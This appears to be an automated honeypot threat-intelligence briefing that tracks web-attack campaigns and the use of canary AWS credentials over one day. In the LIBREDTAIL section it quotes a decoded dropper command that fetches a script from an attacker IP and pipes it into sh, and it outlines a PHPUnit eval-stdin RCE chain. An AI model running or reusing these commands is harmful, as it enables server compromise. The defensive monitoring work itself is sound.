FLUX FLEET — INTEL BRIEFING №16
Period: 2026-09-10 07:32 – 2026-09-11 07:32 UTC (24h digest window, day 15 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 15-day baseline, every result-tag spike attributed by spot query)
The digest window starts at the previous digest run time. Events from 03:32 to 07:32 UTC on 09-10 appear in both this digest and №15's data. The true new window starts at 07:32 UTC on 09-10. All times are UTC and quoted from the raw log timestamps. №15's tail (182.8.249.108's two mints at 04:38–04:39, 204.76.203.18's loop tail through 07:31, and the 94.154.43.x pool probes) is overlap and is not recounted as new. control-1's log sync failed for the second consecutive cycle (
ssh root@100.127.175.34times out; re-verified 09-11 after the digest), so control-1 contributed zero true-window data — its digest rows are last-synced tail and its campaign figures this cycle are floors, not observations.
BLUF
XMLRPC-BRUTE returned at record volume: 207.175.64.93 (Google LLC, BE) fired 8,131 system.multicall POSTs at /xmlrpc.php on farm in 4 minutes 12 seconds, one fixed username (spd) against ~7,842 rotating passwords, with the same preflight trio №14's operator used. The OMEGA-SWEEP census came home to its /46 block: 94.154.46.245 ran the 743-path/93-family single-minute census on aidev and minted 10, and two IPs from the sibling 94.154.43.x pool minted for the first time. METADATA-HUNT went silent — zero runners and zero template markers in the window, the first empty window since tracking began. MEVSPACE-GITWALK revived after six idle windows with two operators, including a Hetzner IPv6 walker that hit both EU nodes. The Tracebit funnel stayed closed: 26 mints to 14 collectors, zero AWS use, the second consecutive zero-use window.
Key Judgements
- XMLRPC-BRUTE is now a multi-operator commodity with a record burst. 207.175.64.93 (Google LLC, BE) POSTed 8,131 multicall bodies to
/xmlrpc.phpfrom 15:26:41 to 15:30:53 UTC on farm, 8,139 events across only 5 paths, one UA (forged Chrome/89), and 7,843 distinct body hashes. Every body wrapswp.getUsersBlogswith the fixed usernamespdand a rotating password (captured samples:travel123me,fo az902,1dc5df,m@eJ#Dx7jy2hpXH,xkdr7k). The preflight (/wp-includes/wlwmanifest.xml,/wp-json/wp/v2/users/,/wp-json/oembed/1.0/embed) matches №14's 35.233.85.98 shape. A Google ASN source hosting a 7843-body single-account dictionary is new to the record. (High confidence — per-IP counts and bodies fromv_full; the whole farmwp-xmlrpc-postspike is this one IP, 0 mints) - The OMEGA-SWEEP operator pool now mints from two hosting blocks and its original pool. 94.154.46.245 (Omegatech, US) ran the census on aidev at 16:25:28–16:25:41 UTC: 1,500 events, 743 paths, 93 trap families, forged
Googlebot/2.1, 10 mints at/.env— the №12 template path for path. Then 94.154.43.146 (aidev, 18:51:05) and 94.154.43.180 (farm, 18:51:44) each minted 1 in single-/.env-request runs under a forged Chrome/147 UA — the first observed mints from the 94.154.43.x pool, which previously only probed. (High confidence — per-IP result inventories compared by spot query; the 93-family count and UA match the №12–№15 record) - METADATA-HUNT paused. The window contains zero
__aws_leak_probeor@fsevents and no runner — the first zero-runner window in the record (№13: three runners, №14: one, №15: one). The mint collapse (67 → 26) follows directly: the 25-mint runner batches are absent. (High confidence — exact-zero counts on both template marker paths across all sensors) - MEVSPACE-GITWALK revived with two operators. The original 109.205.211.201 (MEVSPACE sp. z o.o., AZ) returned on farm at 20:50:15 UTC with a 142-path
.gitwalk (144 events,fake-git+gitignoreresults). A second operator, 2a01:4f8:161:34c1::2 (Hetzner Online GmbH, DE), ran the same environment-named-ref walk on both EU nodes 10 minutes apart (aidev 02:19, farm 03:21 UTC on 09-11): 288 events, 142 paths each node, stale Firefox/78 UA, 286fake-gitresults, 0 mints. This is the template's first standalone run since day 8. (Moderate confidence — same path families and UA class as the №9 template; the Hetzner IPv6 differs from №10's2a01:4f8:141:225b::2, so two Hetzner IPv6 operators now exist)
Active Campaigns (day 15 status)
Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.
⟳ XMLRPC-BRUTE (xmlrpc multicall brute) — hostile, returned at record volume, new operator class
- Actors: 207.175.64.93 (Google LLC, BE), farm only, one burst 15:26:41–15:30:53 UTC: 8,139 events, 8,131 POSTs, all
wp-xmlrpc-post200s. No other IP touched/xmlrpc.phpin the window. №14's operator 35.233.85.98 stayed silent. - TTPs: Preflight trio then flood:
/wp-includes/wlwmanifest.xml,/wp-json/wp/v2/users/,/wp-json/oembed/1.0/embed, then 8,131 POSTs of<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>...wrappingwp.getUsersBlogswith fixed usernamespdand ~7,842 rotating passwords. Bodies averaged ~490 bytes, 7,843 distinct hashes — a single-account dictionary at 32 POSTs/second. Same anatomy as №14's 35.233.85.98 run (preflight + fixed user + rotating passwords), different hosting (Google BE vs GCP BE), larger by 5×. - Assessment: Third operator in the campaign's history (Google Cloud day 2, 1337 Services №2–7, 35.233.85.98 №14, now 207.175.64.93). The fake-WordPress farm absorbed all 8,131 POSTs at 200 with 0 mints. The burst drove farm's +86% volume delta alone: without it, farm ran ~1,600 events against a 5,222 7-day average. Volume, not novelty, is the story — watch for the
spdusername on other IPs.
⟳ OMEGA-SWEEP (Omegatech census template, forged Googlebot/2.1) — hostile, returned to the /46 block, pool minted
- Actors: 94.154.46.245 (Omegatech LTD, US) on aidev, first appearance as an operator: 16:25:28–16:25:41 UTC, 1,500 events, 10 mints. The pool IPs 94.154.43.146 (aidev) and 94.154.43.180 (farm) minted 1 each at 18:51 UTC. The other /46 operators (.242, .243, .247, .248) did not run.
- TTPs: Single-minute census, forged
Googlebot/2.1,/.envmint paths inside the run. The .245 inventory covers 93 trap families and drove every aidev spike this cycle:ssh-private-key-error54,app-config-python40,app-config-php30,rails-database-yml22 — each spike is 100% this IP. - Assessment: The census returned to its home block after №15's two-window escape to Omegatech-US-control and Dedik-CH. Four hosting blocks have now run the wordlist (94.154.46.x ×4, 176.65.144.71, plus the .43 pool's first mint), and the pool itself shifted from probe-only to minting. The /46 hoard roster stands at .243 (31), .244 (12), .247 (12), .248 (10), .242 (6), .245 (10) — all zero observed use.
⟳ MEVSPACE-GITWALK (git-internals walk) — hostile, revived after six idle windows, two operators
- Actors: 109.205.211.201 (MEVSPACE sp. z o.o., AZ) — the original №9 operator — on farm, 20:50:15–20:50:17 UTC, 144 events, 142 paths. New operator 2a01:4f8:161:34c1::2 (Hetzner Online GmbH, DE) on both EU nodes: aidev 02:19–02:21 UTC, farm 03:21–03:23 UTC on 09-11, 288 events, 142 paths per node, 1 UA.
- TTPs: Environment-named refs walk unchanged:
/.git/refs/remotes/origin/{staging,release,prod,production},/.git/refs/tags/{v1.1,v2.0.0,latest},/.git/logs/refs/heads/develop,/.git/objects/info/packs,/.git/hooks/{update,post-update}.sample,/.git/refs/wip/{wtree,index}/refs/heads/{dev,main}. 286fake-gitresults. Stale Firefox/78 UA on the IPv6 walker. - Assessment: The registry marked the template commoditized via CRUSADER-SWEEP class B; this is its first direct two-operator return. Both runs drew
fake-gitresponses and minted nothing. Two operators in one window after six idle ones reads as re-activation, not residue — watch for a second Hetzner IPv6 and for object-hash fetches (GIT-VAULT's №13 upgrade).
⟳ LIBREDTAIL-KIT (phpunit RCE + key exfil + shell dropper) — hostile, third window, dropper arg reverted
- Actors: 8 full-kit IPs, one ~49-event/44-path run each, on both EU nodes, 0 mints: 187.87.144.234 (farm, 10:11), 62.238.58.32 (aidev, 13:44), 160.250.132.238 (aidev, 19:22), 60.49.60.81 (aidev, 21:55), 149.50.101.31 (farm, 02:48 on 09-11), 169.58.204.118 (farm, 00:38 on 09-11), 85.239.149.72 (aidev, 05:29 on 09-11), 13.83.90.155 (aidev, 17:58). Plus a 4-event partial from 103.100.211.183 (aidev, 14:10). ASNs span 5 countries; no concentration.
- TTPs: Chain unchanged:
md5("Hello PHPUnit")-class probes acrosseval-stdin.phppermutations (the 222-eventphpunit-eval-stdinspike is 8×37 exactly these runs), 2×POST /index.phpwithshell_exec(base64_decode(...)), thenPOST /bin/sh. The dropper body, verbatim after decode:(wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s apache. The №15cve_2024_4577.selfrepargument is gone — 0 hits in the window. - Assessment: Third consecutive window, staging host 217.60.195.113 unchanged across all three. The argument flip-flop (
apache→selfrep→apache) reads as per-run operator choice, not a payload change. Theselfrepclaim stays unverified; the fleet again saw no self-propagation.
⟳ REGISTRY-HUNT (LeakIX weblogic→docker-registry walk) — borderline scanner, contracted to 7 IPs, GraphQL probes grew
- Actors: 7
l9scanIPs this window (№15: 24), all DigitalOcean, on farm and aidev: 142.93.129.190 (82 events, both nodes), 143.110.213.72, 139.59.132.8, 139.59.136.184, 159.89.127.165, 167.99.210.137, 46.101.1.225 (41 each). 328 events total, 7 mints (1 per IP), the two UA variants still split by sensor. - TTPs: The 15-step template unchanged. GraphQL probes grew: 24
/graphqlevents (12 per node), 16graphql-introspection, 8graphql-credential-canaryhits — all 7 runners probed it, vs 6 single probes in №15. - Assessment: Wave size collapsed but per-IP depth held and the GraphQL family is now standard in the walk. LeakIX stays a report-as-scanner entry: 1 mint per IP, shallow, honest attribution, no hostile journeys.
⟳ CREDSWEEP (.env-variant census) — hostile, Feo Prest second operator returned
- Actors: 213.209.159.175 (Feo Prest SRL, DE) on farm, 22:43:17–22:43:18 UTC: 51 events, 49 paths, 1 mint at
/.env, Android Facebook in-app Chrome/33 UA, blocklisted ipsum:3+firehol2. №15's farm operator .154 did not run; 45.148.10.238 stayed absent (third window). - TTPs: The standard
.env-variant census:/.env[issued],/backend/.env,/api/.env,/sendgrid.env,/admin/.env,/phpinfo.php,/app_dev.php/_profiler/open,/appsettings.json. Identical result sequence to 80.94.95.211's runs — a shared wordlist across the two operators. - Assessment: The Feo Prest /24 now shows census runs from two IPs across three windows (.175 control №14, farm №16; .154 farm №14–№15). Both operators mint sometimes, never use. Template-recruitment pattern holds.
⟳ WP-ENUM (WordPress plugin readme census) — hostile, returned from a sibling block
- Actors: ⚠ Nine IPs in 45.156.128.x on both EU nodes, 170 events, one shared bare UA (
Mozilla/5.0 AppleWebKit/537.36 ... Chrome/123.0.6312.86 Safari/537.36, no platform token): farm 11:17–11:18 (45.156.128.47 with 34 paths, 45.156.128.126 with 29), aidev 22:18–22:22 (45.156.128.10/.13/.14/.15 with 13–19 paths each), plus 3 IPs with 9/-only tarpit events each. 122 distinct pluginreadme.txtpaths, allnot-handled. - TTPs: WordPress plugin
readme.txtcensus +wp-rest-indexprobes — the №8 WP-ENUM shape. The source block sits one octet from №8's operator 45.156.129.136. - Assessment: First return in nine windows, from a sibling /24 with an 8-IP fanout — a scale-up of the original single-burst census. 0 mints. Treat as WP-ENUM's second generation; a third run from this block will make the operator pool real.
⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, shrank below alarm
- Actors: 52 credential POSTs in the true window (farm 38, aidev 14) from distinct IPs, forged browser UAs, whole-window spread. №15's 149-pair peak and the WP-REST-ENUM sibling (1 event) both fell away.
- Assessment: 100 → 149 → 52. The 200-pair growth alarm stays armed; background noise.
Standing actors (persistence check)
- 80.94.95.211 (SS-Net, RO) — ninth window in ten: aidev, 102 events, 49 paths, 2 mints (11:06 UTC on 09-10 under the Firefox/2.0.0.1 forgery, 06:54 UTC on 09-11 under Chrome/14). 10 all-time mints, zero observed use. The result sequence matches 213.209.159.175's exactly — same wordlist, second standing operator confirmed again.
- 16.5.0.236 (
Hello WorldUA) — returned on all 3 nodes, 32 events. Benign-shape. - 89.248.172.33 / 93.174.93.12 / 89.248.171.24 / 89.248.172.11 — uptime-prober set, present and
/-only:.33108 events, 93.174.93.12 95,.2414,.114. Benign-shape. - 3.129.187.38 (
visionheight.com/scan) — fourth consecutive window: 38 events across farm and aidev,/+/robots.txtonly. - New single-
/.envcollectors: 147.90.209.220 (farm, 1 mint at 22:19, empty UA, 2 events all-time — the №15 one-mint collector family returned), 182.8.249.108 minted only in №15's tail (04:38–04:39, overlap, not recounted). - Absent this window: 45.148.10.238 (third), 91.245.74.31 (third), 43.228.157.68 (no second run — stays standing), 193.32.204.199, 64.49.8.54, 132.196.6.75, 198.23.174.202, 159.26.110.179 (third), 213.209.159.154, 94.154.46.242/.248, 176.65.144.71, 35.233.85.98 (XMLRPC-BRUTE operator), 160.178.89.73 (NIGHTAGENT idle again — second idle in three windows), 18.116.101.220, 84.21.173.161, 102.220.161.87/.102, and 91.92.241.215.
Canary credentials
Summary
No canary credentials were used in AWS during the window. Fleet sensors minted 26 credentials to 14 collector IPs; none reached AWS.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 26 |
| Distinct collector IPs | 14 |
| Credentials used in AWS (alerts) | 0 |
| Credentials stolen, no observed AWS use in window | 26 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
94.154.46.245 |
ai-devbox-1 | 10 | 0 | 0 | — | 10 mints since 2026-09-10 16:25 |
80.94.95.211 |
ai-devbox-1 | 2 | 0 | 0 | — | 8 mints since 2026-09-04 11:07 |
139.59.132.8 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-10 20:35 |
139.59.136.184 |
ai-devbox-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-05 20:41 |
140.245.97.208 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-11 02:49 |
140.245.97.208 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-11 02:49 |
142.93.129.190 |
ai-devbox-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-07 20:16 |
142.93.129.190 |
canary-farm-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-07 20:16 |
143.110.213.72 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-10 20:31 |
147.90.209.220 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-09 02:44 |
159.89.127.165 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-10 20:35 |
167.99.210.137 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-05 20:38 |
213.209.159.175 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-10 22:43 |
46.101.1.225 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-07 20:22 |
94.154.43.146 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-04 14:45 |
94.154.43.180 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-10 18:51 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25136.67.37.69: 25 mints, 2026-09-08 19:55 → 2026-09-08 19:5534.22.137.199: 25 mints, 2026-09-07 17:26 → 2026-09-07 17:2634.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:0934.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:1035.252.125.133: 25 mints, 2026-09-08 18:51 → 2026-09-08 18:5294.154.46.243: 20 mints, 2026-09-04 03:42 → 2026-09-04 03:42136.85.124.29: 17 mints, 2026-09-07 15:44 → 2026-09-07 15:44196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:2694.154.46.247: 12 mints, 2026-09-06 19:02 → 2026-09-06 19:0234.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:3587.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:0645.148.10.238: 10 mints, 2026-09-05 20:43 → 2026-09-07 12:1994.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:2594.154.46.248: 10 mints, 2026-09-08 07:51 → 2026-09-08 07:51136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28167.99.79.44: 8 mints, 2026-09-08 19:11 → 2026-09-08 20:2480.94.95.211: 8 mints, 2026-09-04 11:07 → 2026-09-11 06:5491.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:3041.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:4772.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:2294.154.46.242: 6 mints, 2026-09-09 16:38 → 2026-09-09 16:39102.220.161.87: 4 mints, 2026-09-07 23:07 → 2026-09-09 13:44136.70.70.191: 4 mints, 2026-09-09 03:53 → 2026-09-09 03:53139.59.136.184: 4 mints, 2026-09-05 20:41 → 2026-09-10 20:35142.93.129.190: 4 mints, 2026-09-07 20:16 → 2026-09-10 20:23176.65.144.71: 4 mints, 2026-09-09 21:56 → 2026-09-09 21:56182.8.227.195: 4 mints, 2026-09-04 21:16 → 2026-09-06 23:30185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:26194.180.49.37: 4 mints, 2026-09-04 16:02 → 2026-09-04 17:1831.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:23206.189.95.232: 3 mints, 2026-09-04 20:32 → 2026-09-09 21:44209.97.180.8: 3 mints, 2026-09-05 20:42 → 2026-09-09 14:3541.140.11.235: 3 mints, 2026-09-08 06:34 → 2026-09-08 06:4584.21.173.161: 3 mints, 2026-09-06 22:19 → 2026-09-07 13:00
Canary-use attribution (briefing prose)
The funnel stayed closed: 26 mints to 14 collectors, zero AWS calls for the second consecutive window. Mint volume collapsed with the METADATA-HUNT pause — the two 25-mint runner batches that dominated №14–№15 were absent, and the largest window batch fell to 10 (the OMEGA census). The 159.26.110.179 credentials remain out of the 6-day history with no recorded consumption; its №14 GetCallerIdentity success is still the funnel's only non-Converse use and its only success. First-time mints: 94.154.43.146 and 94.154.43.180 — the pool block moved from probe-only to minting. Treat the zero as "no observed use": №14's uses trailed the mint by hours, and the persistent hoards (94.154.46.x at 31+12+10+10+6, 80.94.95.211 at 8) are unchanged.
Fleet Observations
- Canary economics: True-window mints 26 to 14 collectors (farm 9, aidev 17 per the spot query's
issuedrows; digest-window table reads farm 9 / aidev 19 / control 0), all["aws"]. Mint failures: 0 — the first zero-failure window since tracking began. All-time: 876 credentials to 252 collector IPs (850 + 26 minted this window). - XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows (855 requests carried single-entry XFF) — fourteenth consecutive clean day post-fix.
- TLS/attribution posture: Farm served 403 https events in the true window (8,748 Host-header events on
sso.rightabouteverything.showin the digest window, 928 on the bare IP), aidev 318 https oninference.fapthropic.com(2,488 on the bare IP). Control stayed deliberately certless: 0 https. - Volume: Digest window 13,123 events (farm 9,728 +86% / aidev 2,914 −86% / control 481 −87%). Farm's +86% is one actor: 207.175.64.93's 8,139-event burst (the 11:00 UTC hour alone ran 8,225). Aidev's −86% against a 21,045 7-day average is baseline distortion — the 7-day mean carries CRUSADER-SWEEP class B's 50,112-event day and the big censuses; this window's aidev driver was the 1,500-event OMEGA census (the 16:00 hour, 1,523 events). Control's −87% is not a signal: the node is blind (see the digest-quirks note and Gaps 1) and its digest rows are last-synced tail.
- Control discovery velocity: Unmeasurable this cycle — the 2026-09-11 digest row (481 events, 35 IPs) is stale-tail overlap from 204.76.203.18's loop, not new discovery. The day-15 cell is a hole in the ramp dataset: 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → 110 → 78 → blind.
- Result-tag spikes: Every spike attributed by spot query. aidev
phpunit-eval-stdin222 (4.5×) = 8 LIBREDTAIL runs × 37; aidevcmd-injection-php-cgi-rce32 (6.1×) = the same 8 runs'/bin/sh+ RCE stages (42 events, 9 IPs in the window); aidevssh-private-key-error54,app-config-python40,app-config-php30,rails-database-yml22 = 94.154.46.245's census alone; farmwp-xmlrpc-post8,131 (6.3×) = 207.175.64.93 alone; farmmethod-not-allowed30 = the two Nmap NSE scanners (24) + LeakIX (6). All spikes attributed. - Digest quirks (all re-checked this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast; single-writer DuckDB lock (all spot queries ran sequentially); sync-arrival first-seen stamps; window overlap with №15 cross-checked before counting anything new. Carried from №15: the control-1 sync failure repeated (
ssh root@100.127.175.34times out; verified 2026-09-11 after the digest) — two consecutive failures, a 24-hour blind spot per failure on the differential node. - Infrastructure: no fleet-side changes this cycle. control-1's second consecutive sync failure is the one operational exception, noted above and in Gaps.
Gaps / Next Collection
- control-1 recovery. Two consecutive sync failures. Before the next run, check reachability (
ssh root@100.127.175.34 true; the only permitted node action issystemctl start flux-log-sync.serviceonce SSH answers). A third failure turns the control-velocity dataset into a 3-day hole and leaves MALWARE-DICT's loop, the fresh-IP ramp, and any control-only campaign unobserved. - The funnel's third zero. Two consecutive zero-use windows against 93 minted credentials. Check the Tracebit pull window against the full mint history of the 35 persistent collectors (uses can trail the flux cutoff — the №14 precedent), and re-check the 159.26.110.179 credentials outside the flux window. A third zero against a growing hoard makes the resale hypothesis the lead explanation.
- METADATA-HUNT's pause. Zero runners after 5 runner days. A return next cycle with the absorbed ORACLE-SWEEP families intact means a pause; a return with a changed wordlist means an upgrade. Check for the 25-mint batch shape first.
- XMLRPC-BRUTE operator spread. The
spd-username multicall shape at 32 POSTs/s is new. Check №14's 35.233.85.98 (ac14tbobpb) for a return and watch for either username on other IPs — a third operator inside four windows makes the commodity label definitive. - WP-ENUM scale-up. The 45.156.128.x cluster ran 122 readme paths across 8 working IPs. A second run, or a mint, promotes the cluster; check whether the 45.156.129.136 original rejoins.
- MEVSPACE-GITWALK persistence. Two operators in one revival window. Watch for a Hetzner IPv6 /29 pattern and for object-hash fetches (
/.git/objects/<2>/<38>), which would merge this with GIT-VAULT's №13 upgrade.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-11.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (207.175.64.93), plus 30 ad-hoc v_full queries (XMLRPC burst profile and body extraction, OMEGA census and pool-mint attribution, LIBREDTAIL roster and dropper decode, MEVSPACE revival profile, WP-ENUM cluster profile, spike attribution per tag, standing-actor persistence, mint roster) and the Tracebit canary-section generator.